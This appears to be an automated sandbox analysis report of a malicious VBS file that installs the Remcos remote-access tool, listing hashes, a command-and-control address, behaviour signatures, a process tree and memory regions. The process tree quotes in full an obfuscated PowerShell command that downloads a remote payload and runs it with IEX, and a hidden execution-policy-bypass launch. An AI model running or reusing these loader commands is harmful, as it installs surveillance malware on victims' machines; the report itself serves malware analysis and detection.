Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
20-04-2021 06:00
General
-
Target
Appraisal11002275444900.vbs
-
Size
662B
-
MD5
8da164753530662b1f603f7b23413223
-
SHA1
18a3665edcb3b3d3c53f9755bc225569a64ae642
-
SHA256
b61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388
-
SHA512
b3c8b9e85c2ab36abf02b479e68287890d94f8c125151ed88f8f26a509444de8207835b51131eee1095f7f3bf37e284e6853ff3b9aa63e91781f2e93b68e95c0
Malware Config
Extracted
remcos
194.5.97.183:8888
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Blocklisted process makes network request 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 43 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Appraisal11002275444900.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v0 ='N#t.@@#b'.Replace('#','e').Replace('@@','w');$v00 = '%li!!'.Replace('%','C').Replace('!!','ent');$V000 = 'D$$$$$$$$$$$n%%%%%%%%%%%%ng'.Replace('%%%%%%%%%%%%','loadStri').Replace('$$$$$$$$$$$','ow');$v1 = '$e^'.replace('$','I').replace('^','x');$v9999 = '(Ne`W&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&00(''https://ia601405.us.archive.org/15/items/all_20210407_20210407_0728/ALL.TXT'')'.Replace('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&','-O`BjEcT $v0$v00 ).$V0');$TC=I`E`X ($v9999 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windo 1 -noexit -exec bypass -file "C:\Users\Public\ Microsoft.ps1"3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"4⤵
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
023e3629230c97ee512ba0b1b5a0f4c5
SHA1bc844320b29d8b0f7b8861c4bf4a5ccafda9ee06
SHA25654f54a146f091777c976f8232e1985dec68bc2b46ed183bb3e31352c8d254896
SHA512da2161879a243a1930daf9c65f8e879cc5899ec23496c3f1c328a89a3fc6b0958c36891d42c030e899ddaa8c760f1297a2337db5fb5f5f0a8b7c89063e2a0894
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
7f551a39dcd11eac4c89c54ebdef73cf
SHA14580923df7981be10e3580028b9ed3124989efb2
SHA256b578ca32295c5cdcebcacc975ea0b8f9e07e0538a1c9e6998740d63bce457785
SHA512e48a4db57128216aae1460de9df8dc54cb32c32d55dc9afb18424dc26096ded254c25913481f83a8d295f7d4e0945fd50b1bcfa8efbb029cee18cbf3fd5d7f0e
-
C:\Users\Public\ Microsoft.ps1MD5
b5795726bb04f5f9584184ae1f50777b
SHA191b250e76c41066a009b70200c5254a40980228b
SHA2565d9ba7ab51a7d06ad420cb23f7c1e02b911fe2e25d7af1eebe25d1690231d784
SHA51210ba2e523af4ccdf3e1e0867aa4d50a58919f5d39073bac17a8ab491f5ce09bcbda0730b9485a503adccfa323642b19e29879a0ad88f609d683080b668ef95fb
-
memory/484-59-0x000007FEFB761000-0x000007FEFB763000-memory.dmpFilesize
8KB
-
memory/1016-88-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1016-87-0x0000000075AD1000-0x0000000075AD3000-memory.dmpFilesize
8KB
-
memory/1016-85-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/1016-86-0x000000000042EEEF-mapping.dmp
-
memory/1772-70-0x0000000000000000-mapping.dmp
-
memory/1772-77-0x000000001AC80000-0x000000001AC82000-memory.dmpFilesize
8KB
-
memory/1772-78-0x000000001AC84000-0x000000001AC86000-memory.dmpFilesize
8KB
-
memory/1772-82-0x000000001AA00000-0x000000001AA18000-memory.dmpFilesize
96KB
-
memory/2020-69-0x000000001C4A0000-0x000000001C4A1000-memory.dmpFilesize
4KB
-
memory/2020-68-0x000000001B890000-0x000000001B891000-memory.dmpFilesize
4KB
-
memory/2020-67-0x0000000002520000-0x0000000002521000-memory.dmpFilesize
4KB
-
memory/2020-66-0x00000000025C0000-0x00000000025C1000-memory.dmpFilesize
4KB
-
memory/2020-64-0x000000001AB90000-0x000000001AB92000-memory.dmpFilesize
8KB
-
memory/2020-65-0x000000001AB94000-0x000000001AB96000-memory.dmpFilesize
8KB
-
memory/2020-63-0x000000001AC10000-0x000000001AC11000-memory.dmpFilesize
4KB
-
memory/2020-62-0x0000000002360000-0x0000000002361000-memory.dmpFilesize
4KB
-
memory/2020-60-0x0000000000000000-mapping.dmp